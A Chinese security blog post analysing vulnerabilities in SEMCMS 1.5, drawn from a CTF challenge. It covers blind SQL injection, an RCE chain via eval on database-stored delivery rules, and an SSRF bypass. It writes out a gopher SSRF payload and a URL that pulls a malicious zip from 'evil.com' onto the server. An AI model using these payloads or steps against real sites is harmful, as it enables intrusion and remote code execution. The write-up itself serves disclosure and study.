<!DOCTYPE html>
<html lang="en">

<!-- Head tag (contains Google-Analytics、Baidu-Tongji)-->
<head>
  <!-- Google Analytics -->
  
    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async="async" src="https://www.googletagmanager.com/gtag/js?id=G-V3C5GQ73TE"></script>
    <script type="text/javascript">
      window.dataLayer = window.dataLayer || [];

      function gtag() {
        dataLayer.push(arguments);
      }
      gtag('js', new Date());

      gtag('config', 'G-V3C5GQ73TE');
    </script>
  

  <!-- Baidu Tongji -->
  
    <script type="text/javascript">
      // Originial
      var _hmt = _hmt || [];
      (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?x";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
      })();
    </script>
  

  <!-- Baidu Push -->
  
    <script>
      (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
          bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
          bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
      })();
    </script>
  

  <meta charset="utf-8"/>
  <meta http-equiv="X-UA-Compatible" content="IE=edge"/>

  <meta name="google-site-verification" content="lxDfCplOZbIzjhG34NuQBgu2gdyRlAtMB4utP5AgEBc"/>
  <meta name="baidu-site-verification" content="PpzM9WxOJU"/>

  <meta name="viewport" content="width=device-width, initial-scale=1"/>
  <meta name="description" content="Morouu的大狗窝 ●&#39;◡&#39;●"/>
  <meta name="keyword" content="Morouu,morouu"/>
  <link rel="shortcut icon" href="//morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112302341051.png"/>

  <!-- Place this tag in your head or just before your close body tag. -->
  <script async="async" defer="defer" src="https://buttons.github.io/buttons.js"></script>

  
    <!-- Bootstrap Core CSS -->
    <link rel="stylesheet" href="/css/bootstrap.min.css"/>

    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/beantech.min.css"/>

    <!-- Pygments Highlight CSS -->
    <link rel="stylesheet" href="/css/highlight.css"/>
    <link rel="stylesheet" href="/css/widget.css"/>
    <link rel="stylesheet" href="/css/rocket.css"/>
    <link rel="stylesheet" href="/css/signature.css"/>
    <link rel="stylesheet" href="/css/catalog.css"/>
    <link rel="stylesheet" href="/css/livemylife.css"/>

    
      <!-- wave start -->
      <link rel="stylesheet" href="/css/wave.css"/>
      <!-- wave end -->
    

    
      <!-- top start (article top hot config) -->
      <link rel="stylesheet" href="/css/top.css"/>
      <!-- top end -->
    

    
      <!-- ThemeColor start -->
      <link rel="stylesheet" href="/css/scroll.css"/>
      <!-- ThemeColor end -->
    

    
      <!-- viewer start (Picture preview) -->
      <link rel="stylesheet" href="/css/viewer.min.css"/>
      <!-- viewer end -->
    

    
      <!-- Search start -->
      <link rel="stylesheet" href="/css/search.css"/>
      <!-- Search end -->
    

    
      <!-- ThemeColor start -->
      <link rel="stylesheet" href="/css/themecolor.css"/>
      <!-- ThemeColor end -->
    

    

    
  

  <!-- Custom Fonts -->
  <!-- <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css" rel="stylesheet" type="text/css"> -->
  <!-- Hux change font-awesome CDN to qiniu -->
  <link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/4.5.0/css/font-awesome.min.css" type="text/css">
  <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">

  <!-- Hux Delete, sad but pending in China <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link
  href='http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/ css'> -->

  <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
  <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
  <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script> <![endif]-->

  <!-- ga & ba script hoook -->
  <link rel="canonical" href="https://morblog.cc/posts/1286047278/">
  <title>
    
      漏洞挖掘 - SEMCMS1.5 - Morouu的大狗窝 ●&#39;◡&#39;●
    
  </title>
<meta name="generator" content="Hexo 5.4.0"></head>


<!-- hack iOS CSS :active style -->

	<body ontouchstart="" class="body--light body--light">


		<!-- ThemeColor -->
		
		<!-- ThemeColor -->
<style type="text/css">
  .body--light {
    --light-mode: none;
    --dark-mode: block;
  }
  .body--dark {
    --light-mode: block;
    --dark-mode: none;
  }
  i.mdui-icon.material-icons.light-mode {
    display: var(--light-mode);
  }
  i.mdui-icon.material-icons.dark-mode {
    display: var(--dark-mode);
  }
</style>
<div class="toggle" onclick="document.body.classList.toggle('body--dark')">
  <i class="mdui-icon material-icons light-mode"></i>
  <i class="mdui-icon material-icons dark-mode"></i>
</div>
<script>
  //getCookieValue
  function getCookieValue(a) {
    var b = document.cookie.match('(^|[^;]+)\\s*' + a + '\\s*=\\s*([^;]+)');
    return b
      ? b.pop()
      : '';
  }
  let themeMode = 'light';
  if (getCookieValue('sb-color-mode') && (getCookieValue('sb-color-mode') !== themeMode)) {
    let dbody = document.body.classList;
    themeMode === 'dark' ? dbody.remove('body--dark') : dbody.add('body--dark');
  }

  //setCookieValue
  var toggleBtn = document.querySelector(".toggle");
  toggleBtn.addEventListener("click", function () {
    var e = document.body.classList.contains("body--dark");
    var cookieString = e
      ? "dark"
      : "light";
    var exp = new Date();
    exp.setTime(exp.getTime() + 3 * 24 * 60 * 60 * 1000); //3天过期
    document.cookie = "sb-color-mode=" + cookieString + ";expires=" + exp.toGMTString() + ";path=/";
  });
</script>

		

		<!-- Gitter -->
		
		<!-- Gitter -->
<!-- Docs:https://gitter.im/?utm_source=left-menu-logo -->
<script>
  ((window.gitter = {}).chat = {}).options = {
    room: 'dmantick/morcruiser'
  };
</script>
<script src="https://sidecar.gitter.im/dist/sidecar.v1.js" async defer></script>

		

		<!-- Navigation (contains search)-->
		<!-- Navigation -->
<nav class="navbar navbar-default navbar-custom navbar-fixed-top">
  <div class="container-fluid">
    <!-- Brand and toggle get grouped for better mobile display -->
    <div class="navbar-header page-scroll">
      <button type="button" class="navbar-toggle">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="/">Morouu的大狗窝 ●&#39;◡&#39;●</a>
    </div>

    <!-- Collect the nav links, forms, and other content for toggling -->
    <!-- Known Issue, found by Hux: <nav>'s height woule be hold on by its content. so, when navbar scale out, the <nav> will cover tags. also mask any touch event of tags, unfortunately. -->
    <div id="huxblog_navbar">
      <div class="navbar-collapse">
        <ul class="nav navbar-nav navbar-right">
          <li>
            <a href="/">首页</a>
          </li>

          
          
          
          
          <li>
            <a href="/about/">
              
              关于
              
              
            </a>
          </li>
          
          
          
          <li>
            <a href="/categories/">
              
              分类
              
              
            </a>
          </li>
          
          
          
          <li>
            <a href="/tags/">
              
              标签
              
              
            </a>
          </li>
          
          
          
          <li>
            <a href="/archive/">
              
              归档
              
              
            </a>
          </li>
          
          

          
          <li>
            <a class="popup-trigger">
              <span class="search-icon"></span>搜索</a>
          </li>
          

          <!-- LangSelect -->
          
          
          
          
          
        </ul>
      </div>
    </div>
    <!-- /.navbar-collapse -->
  </div>
  <!-- /.container -->
</nav>
<!-- progress -->
<div id="progress">
  <div class="line" style="width: 0%;"></div>
</div>

<script>
  // Drop Bootstarp low-performance Navbar Use customize navbar with high-quality material design animation in high-perf jank-free CSS3 implementation
  var $body = document.body;
  var $toggle = document.querySelector('.navbar-toggle');
  var $navbar = document.querySelector('#huxblog_navbar');
  var $collapse = document.querySelector('.navbar-collapse');

  $toggle.addEventListener('click', handleMagic)

  function handleMagic(e) {
    if ($navbar.className.indexOf('in') > 0) {
      // CLOSE
      $navbar.className = " ";
      // wait until animation end.
      setTimeout(function() {
        // prevent frequently toggle
        if ($navbar.className.indexOf('in') < 0) {
          $collapse.style.height = "0px"
        }
      }, 400)
    } else {
      // OPEN
      $collapse.style.height = "auto"
      $navbar.className += " in";
    }
  }
</script>


		<!-- Post Header (contains intro-header、signature、wordcount、busuanzi、waveoverlay) -->
		<!-- Modified by Yu-Hsuan Yen -->
<!-- Post Header -->

  <style type="text/css">
    .body--light {
      /* intro-header */
      --intro-header-background-image-url-home: url('//morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112302332090.jpg');
      --intro-header-background-image-url-post: url('https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201220240988.jpg?x-oss-process=image/auto-orient,1/interlace,1/resize,m_fixed,w_1920,h_1080');
      --intro-header-background-image-url-page: url('/https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201220240988.jpg?x-oss-process=image/auto-orient,1/interlace,1/resize,m_fixed,w_1920,h_1080');
    }
    .body--dark {
      --intro-header-background-image-url-home: linear-gradient(rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0.2)), url('//morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112302332090.jpg');
      --intro-header-background-image-url-post: linear-gradient(rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0.2)), url('https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201220240988.jpg?x-oss-process=image/auto-orient,1/interlace,1/resize,m_fixed,w_1920,h_1080');
      --intro-header-background-image-url-page: linear-gradient(rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0.2)), url('/https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201220240988.jpg?x-oss-process=image/auto-orient,1/interlace,1/resize,m_fixed,w_1920,h_1080');
    }

    header.intro-header {
       /*post*/
        background-image: var(--intro-header-background-image-url-post);
        /* background-image: url('https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201220240988.jpg?x-oss-process=image/auto-orient,1/interlace,1/resize,m_fixed,w_1920,h_1080'); */
      
    }

    
      #signature {/*signature*/
        background-image: url('//morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112302343273.png');
      }
    
  </style>





<header class="intro-header">
  <!-- Signature -->
  <div id="signature">
    <div class="container">
      <div class="row">
        <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
          
          <div class="post-heading">
            <div class="tags">
              
              <a class="tag" href="/tags/#安全" title="安全">安全</a>
              
              <a class="tag" href="/tags/#漏洞" title="漏洞">漏洞</a>
              
              <a class="tag" href="/tags/#PHP" title="PHP">PHP</a>
              
            </div>
            <h1>漏洞挖掘 - SEMCMS1.5</h1>
            <h2 class="subheading"></h2>
            <span class="meta">
              Posted by morouu on
              2022-01-22
            </span>


            
            <!-- WordCount start -->
            <div class="blank_box"></div>
            <span class="meta">
              Estimated Reading Time <span class="post-count" >8</span> Minutes
            </span>
            <div class="blank_box"></div>
            <span class="meta">
              Words <span class="post-count">2.3k</span> In Total
            </span>
            <div class="blank_box"></div>
            <!-- WordCount end -->
            
            
            <!-- 不蒜子统计 start -->
            <span class="meta" id="busuanzi_container_page_pv">
              Viewed <span id="busuanzi_value_page_pv"><i class="fa fa-spinner fa-spin"></i></span> Times
            </span>
            <!-- 不蒜子统计 end -->
            


          </div>
          
        </div>
      </div>
    </div>
  </div>

  
  <!-- waveoverlay start -->
  <div class="preview-overlay">
    <svg class="preview-waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
      <defs>
        <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"></path>
      </defs>
      <g class="preview-parallax">
        <use xlink:href="#gentle-wave" x="48" y="0" fill=var(--gentle-wave1)></use>
        <use xlink:href="#gentle-wave" x="48" y="3" fill=var(--gentle-wave2)></use>
        <use xlink:href="#gentle-wave" x="48" y="5" fill=var(--gentle-wave3)></use>
        <use xlink:href="#gentle-wave" x="48" y="7" fill=var(--gentle-wave)></use>
      </g>
    </svg>
  </div>
  <!-- waveoverlay end -->
  

</header>



		<!-- Main Content (Post contains
	Pager、
	tip、
	socialshare、
	gitalk、gitment、disqus-comment、
	Catalog、
	Sidebar、
	Featured-Tags、
	Friends Blog、
	anchorjs、
	) -->
		<!-- Modify by Yu-Hsuan Yen -->
<!-- Post Content -->
<article>
  <div class="container" style="margin-left: 10%;">
    <div class="row">
      <!-- Post Container -->
      <div class="col-lg-10 col-lg-offset-1 col-md-10 col-md-offset-1 post-container">

        <h1>漏洞挖掘 - SEMCMS1.5</h1>
<hr>
<h2 id="前言">- 前言 -</h2>
<p>来自去年安询杯的一道题目，当时好兄弟让我看的，不过由于那会忙着体验生活，就没怎么看，现在补上吧。另外，本文仅供网站管理人员与渗透测试人员学习与交流，任何进行的一切未授权攻击行为与本人无关。</p>
<p><strong>希望该CMS的开发者能够尽早修复</strong></p>
<p>在这个 <strong>CMS</strong> 中，会有一个除了管理员外对其他用户未知的后台路径👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211516678.png" alt="image-20220121151645589"></p>
<p>由此可以对依据访问权限分为三大类，分别为 <strong>不知后台路径(前台)</strong> 、 <strong>已知后台路径但不知管理员密码(隐藏前台)</strong>  以及 <strong>已知后台路径且能登录管理员后台(后台)</strong> ，这里就对这三大类依次进行分析挖掘。</p>
<h2 id="前台">- 前台 -</h2>
<h3 id="SQL注入">- SQL注入 -</h3>
<h4 id="用户注册-登录-订阅提交-评论提交-结算页面-盲注">- 用户注册/登录/订阅提交/评论提交/结算页面(盲注) -</h4>
<h5 id="分析">- 分析 -</h5>
<p>罪魁祸首来自没有对 <code>Core/Program/Ant_Contrl.php</code> 文件中的  <code>getIP</code> 函数的调用结果进行过滤，直接来看 <code>getIP</code> 函数👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211607385.png" alt="image-20220121160741290"></p>
<p>其中，在 <code>Core/Program/Ant_Rponse.php</code> 文件中，有关 <strong>用户注册</strong> 、 <strong>用户登录</strong> 、 <strong>订阅提交</strong> 、<strong>评论提交</strong> 以及 <strong>结算页面</strong> 都直接将调用 <code>getIP</code> 函数的结果进行数据库操作。</p>
<p><code>用户注册</code> 👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211611021.png" alt="image-20220121161118903"></p>
<p><code>用户登录</code> 👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211612415.png" alt="image-20220121161220310"></p>
<p><code>订阅提交</code> 👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211613256.png" alt="image-20220121161321143"></p>
<p><code>评论提交</code> 👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211615716.png" alt="image-20220121161536594"></p>
<p><code>结算页面</code> 👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211616379.png" alt="image-20220121161644273"></p>
<p>当然，应该还有其他地方调用了 <code>getIP</code> 函数，不过就不一一列出了。</p>
<p>同时如果跟进 <code>AntAdd</code> 和 <code>AntEdit</code> 函数，可以发现并没有对传入的参数进行操作，而是直接拼接到SQL语句中👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211646825.png" alt="image-20220121164601746"></p>
<h5 id="证明">- 证明 -</h5>
<p>那么这里以用户登录为例，先随意注册一个用户👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211631553.png" alt="image-20220121163101465"></p>
<p>成功注册用户👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211631012.png" alt="image-20220121163148910"></p>
<p>然后退出登录，并在登录时更改 <code>client-ip</code> 标头内容👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211640046.png" alt="image-20220121164027872"></p>
<p>显然 <code>sleep</code> 是成功被执行了，因此确实是存在盲注的。</p>
<h5 id="扩展">- 扩展 -</h5>
<p>另外，由于在用户注册时候可以进行SQL语句拼接，所以来点 <strong>CTF</strong> 后遗症罢，可以依靠二次数据插入来进行变相回显注入，比如👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211743198.png" alt="image-20220121174328065"></p>
<p>此时可以看一下数据库内容👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211744686.png" alt="image-20220121174447614"></p>
<p>使用这个新用户登录👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211746935.png" alt="image-20220121174614848"></p>
<p>可以显式地得到数据的信息。</p>
<h4 id="用户地址管理-盲注">-  用户地址管理(盲注) -</h4>
<h5 id="分析-2">- 分析 -</h5>
<p>在 <code>Core/Program/Ant_Rponse.php</code> 文件中，漏洞原因是对用户地址进行 <code>edit</code> 功能时，没有仅仅对传入的 <code>$_GET</code> 内容进行了过滤，并没有对用户传入的 <code>$_POST['ID']</code> 进行操作👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211643523.png" alt="image-20220121164350423"></p>
<p>同样的，在 <code>AntEditAddress</code> 函数中并没有对传入的参数进行任何操作👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211647613.png" alt="image-20220121164703560"></p>
<h5 id="证明-2">- 证明 -</h5>
<p>还是先登录账号，然后随便新建一个地址👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211649669.png" alt="image-20220121164919515"></p>
<p>然后选择刚刚新建的地址并点击进入编辑👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211649488.png" alt="image-20220121164959414"></p>
<p>之后就是抓包改内容👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211654500.png" alt="image-20220121165420357"></p>
<p>此时就可以通过更改 <code>$_POST['ID']</code> 的值进行盲注了。</p>
<h4 id="订阅提交-盲注">- 订阅提交(盲注) -</h4>
<h5 id="分析-3">- 分析 -</h5>
<p>漏洞点在 <code>Core/Program/Ant_Rponse.php</code> 文件中，原因是没有对 <code>$_POST['e_coucode']</code> 和 <code>$_POST['e_couid']</code> 进行处理👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211753776.png" alt="image-20220121175358686"></p>
<p>跟进 <code>CheckDatas</code> 函数👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211755578.png" alt="image-20220121175502520"></p>
<p>依然是没有对传入的参数进行处理就拼接到了SQL语句中，因此就存在一个盲注。</p>
<h5 id="证明-3">- 证明 -</h5>
<p>由于这个功能并没有验证用户的登陆状态，其实直接上 <strong>burp</strong> 找到对应的路由就好了，不必找真正的页面👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211814094.png" alt="image-20220121181407937"></p>
<p>可以看到 <code>sleep</code> 是成功的被执行了。</p>
<hr>
<h2 id="隐藏前台">- 隐藏前台 -</h2>
<h3 id="补充">- 补充 -</h3>
<p>由于这里的部分是属于 <strong>已知后台路径但不知管理员密码(隐藏前台)</strong> ，因此是过不了管理员登录认证的，一旦某个文件拥有 <code>&lt;?php include_once 'Ant_head.php';?&gt;</code> 这一句代码就可以跳过了。</p>
<p>因为在 <code>Ant_head.php</code> 文件有以下函数调用👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211825709.png" alt="image-20220121182519666"></p>
<p>跟进 <code>CheckUser</code> 函数可以发现存在对管理员登录的认证👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211826454.png" alt="image-20220121182622332"></p>
<p>由此在隐藏目录中，能够访问的页面有以下：</p>
<ul>
<li><code>6gnGtg_Ali/Ant.php</code></li>
<li><code>6gnGtg_Ali/Ant_Ajax.php</code></li>
<li><code>6gnGtg_Ali/Ant_Config.php</code></li>
<li><code>6gnGtg_Ali/Ant_Curl.php</code></li>
<li><code>6gnGtg_Ali/Ant_Function.php</code></li>
<li><code>6gnGtg_Ali/Ant_Inc.php</code></li>
<li><code>6gnGtg_Ali/Ant_left.php</code></li>
<li><code>6gnGtg_Ali/Ant_mid.php</code></li>
<li><code>6gnGtg_Ali/Ant_Outdata.php</code></li>
<li><code>6gnGtg_Ali/Ant_Response.php</code></li>
<li><code>6gnGtg_Ali/index.php</code></li>
</ul>
<h3 id="RCE">- RCE -</h3>
<h4 id="分析-4">- 分析 -</h4>
<p>能够造成任意代码执行的漏洞点在 <code>Core/Program/Ant_Shop.php</code> 文件的 <code>CheckExpress</code> 函数中，当进行查询物流及费用计算时，会对从 <code>sc_delivery</code> 表中取出的内容进行 <code>eval</code> 调用👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211842109.png" alt="image-20220121184242986"></p>
<p>显然要能够执行想要执行的代码，这个有关物流信息的 <code>sc_delivery</code> 表就必须可控，而在 <code>6gnGtg_Ali/Ant_Response.php</code> 文件中是存在对其中任意一个表进行任意操作的👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211855096.png" alt="image-20220121185545917"></p>
<p>此时也就可以基本说是能够随意操控任意一个表的内容了，简单说来整个 <strong>RCE</strong> 的流程为👇</p>
<ul>
<li><code>通过可操作任意表内容的功能构造好合适内容放到sc_delivery表中</code></li>
<li><code>调用CheckExpress函数取出先前构造好的数据库内容实现RCE</code></li>
</ul>
<p>那么先来看如何对任意表进行任意内容的构造，由于在 <code>6gnGtg_Ali/Ant_Response.php</code> 文件中并没有数据库信息的配置，也就是说需要事先对 <code>Core/Program/db_con.php</code> 文件进行一个包含，而在 <code>6gnGtg_Ali/Ant_Inc.php</code> 文件就刚好解决了这个问题👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211907769.png" alt="image-20220121190721708"></p>
<p>因此就可以由 <code>6gnGtg_Ali/Ant_Inc.php</code> 文件作为入口在 <code>6gnGtg_Ali/Ant_Response.php</code> 文件中对任意数据库进行一个任意操作。</p>
<p>接着再看如何调用最为关键的 <code>CheckExpress</code> 函数，那么来到 <code>Core/Program/Ant_Rponse.php</code> 文件中，可以看到当传入的 <code>$_GET['actions']</code> 值为 <code>CheckOutOrder</code> 且用户状态为已登录时，就可以有可能对 <code>CheckExpress</code> 函数进行一个调用👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211914103.png" alt="image-20220121191402969"></p>
<p>现在不妨重新理一下完整的 <strong>RCE</strong> 思路👇</p>
<ul>
<li><code>注册一个用户</code></li>
<li><code>登录用户以便获得$UID</code></li>
<li><code>由6gnGtg_Ali/Ant_Inc.php作为入口点通过6gnGtg_Ali/Ant_Response.php将合适内容插入到sc_delivery表的对应字段中</code></li>
<li><code>访问Core/Program/Ant_Rponse.php并带上相应的参数，触发调用CheckExpress函数达成RCE</code></li>
</ul>
<h4 id="证明-4">- 证明 -</h4>
<p>由于前面已经注册用户了，这里就不进行用户注册，而是登录前面注册好的用户👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211925015.png" alt="image-20220121192546939"></p>
<p>然后构造合适的数据由 <code>6gnGtg_Ali/Ant_Inc.php</code> 作为入口点插入 <code>sc_delivery</code> 表👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211932835.png" alt="image-20220121193210696"></p>
<p>接着访问 <code>Core/Program/Ant_Rponse.php</code> 👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211937182.png" alt="image-20220121193740041"></p>
<p>此时也就可以进行 <strong>RCE</strong> 了。</p>
<h3 id="SSRF">- SSRF -</h3>
<h4 id="分析-5">- 分析 -</h4>
<p>漏洞点在 <code>6gnGtg_Ali/Ant_Curl.php</code> 文件中，其中对传入的 <code>$_GET['url']</code> 的处理存在漏洞👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211944824.png" alt="image-20220121194447759"></p>
<p>由于判断逻辑为 <code>if(strpos($dname[2],'sem-cms.cn') !== false)</code> ，而 <code>$dname</code> 来自 <code>$dname=explode(&quot;/&quot;, $_GET['url']);</code> ，仅仅是判断了 <code>?://[判断部分]</code>  中必须包含 <code>sem-cms.cn</code> 内容，那么假若 <code>$_GET['url']</code> 构造成 <code>gopher://sem-cms.cn:1@127.0.0.1:7000/...</code> 也会是合法的。</p>
<p>那么不妨将 <code>$url</code> 构造成 <code>gopher://sem-cms.cn:1@127.0.0.1:7000/_[SSRF SUCCESS]</code> ，再接着往下看👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211950251.png" alt="image-20220121195024163"></p>
<p>注意一下此时传入 <code>getFile</code> 函数的参数👇</p>
<ul>
<li><code>$url = gopher://sem-cms.cn:1@127.0.0.1:7000/_[SSRF SUCCESS] </code></li>
<li><code>$save_dir = ../Soft/Zip/</code></li>
<li><code>$filename = _[SSRF SUCCESS]</code></li>
<li><code>$type = 1</code></li>
</ul>
<p>继续跟进 <code>getFile</code> 函数👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201211959335.png" alt="image-20220121195942215"></p>
<p>此时 <code>gopher://sem-cms.cn:1@127.0.0.1:7000/_[SSRF SUCCESS]</code> 就会被 <code>curl</code> 。</p>
<h4 id="证明-5">- 证明 -</h4>
<p>先监听 <code>7000</code> 端口，然后传入相关参数就好了👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201212004323.png" alt="image-20220121200414133"></p>
<p>显然是成功利用 <code>gopher</code> 向本地的 <code>7000</code> 端口发送了信息。</p>
<h4 id="扩展-2">- 扩展 -</h4>
<p>由于这个功能本意是从官网上下载更新代码👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201220208135.png" alt="image-20220122020845974"></p>
<p>所以可以通过 <code>http://sem-cms.cn:1@evil.com/evil.zip</code> 从远程服务器上将还有恶意代码的 <code>zip</code> 文件下载解压。</p>
<p>首先将存在恶意代码的文件打包👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201220202859.png" alt="image-20220122020241699"></p>
<p>随意起一个远程服务器👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201220203416.png" alt="image-20220122020337364"></p>
<p>使用 <code>http://sem-cms.cn:1@127.0.0.1:2331/evil.zip</code> 更新恶意压缩包👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201220207936.png" alt="image-20220122020711804"></p>
<p>访问对应的文件👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201220211244.png" alt="image-20220122021159162"></p>
<p>成功地将存在恶意代码的文件解压出来。</p>
<hr>
<h2 id="后台">- 后台 -</h2>
<h3 id="SQL注入-2">- SQL注入 -</h3>
<h4 id="分析-6">- 分析 -</h4>
<p>漏洞点存在多个文件中，影响文件如下：</p>
<ul>
<li><code>6gnGtg_Ali/Ant_Info.php</code></li>
<li><code>6gnGtg_Ali/Ant_M_Contry.php</code></li>
<li><code>6gnGtg_Ali/Ant_M_Member.php</code></li>
<li><code>6gnGtg_Ali/Ant_M_Order.php</code></li>
<li><code>6gnGtg_Ali/Ant_Plist.php</code></li>
<li><code>6gnGtg_Ali/Ant_Pro.php</code></li>
</ul>
<p>主要原理以 <code>6gnGtg_Ali/Ant_Info.php</code> 文件为例，在这里并没有对 <code>$_REQUEST[&quot;info_cat&quot;]</code> 和 <code>$_REQUEST[&quot;skey&quot;]</code> 传入值进行处理，虽然本身自动对 <code>$_GET</code> 都进行了处理仍然可以从 <code>$_POST</code> 传入以绕过对 <code>$_GET</code> 的处理👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201220045459.png" alt="image-20220122004529314"></p>
<p>接着就直接将拼好的语句放到SQL中查询，期间也并没有进行任何处理👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201220048001.png" alt="image-20220122004801882"></p>
<p>可以看到两条查询语句都是存在注入的，但第二条会遍历查询结果把每一条记录显示出来，不妨以第二条作为注入核心进行回显注入。</p>
<p>其他文件也是同样的原理。</p>
<p><code>6gnGtg_Ali/Ant_M_Contry.php</code> 文件👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201220107602.png" alt="image-20220122010724503"></p>
<p><code>6gnGtg_Ali/Ant_M_Member.php</code> 文件👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201220108419.png" alt="image-20220122010802336"></p>
<p><code>6gnGtg_Ali/Ant_M_Order.php</code> 文件👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201220108178.png" alt="image-20220122010835100"></p>
<p><code>6gnGtg_Ali/Ant_Plist.php</code> 文件👇</p>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202201220110721.png" alt="image-20220122011058630"></p>
<p>其中在 <code>ProCatId</code> 函数中其实就存在注入了👇</p>
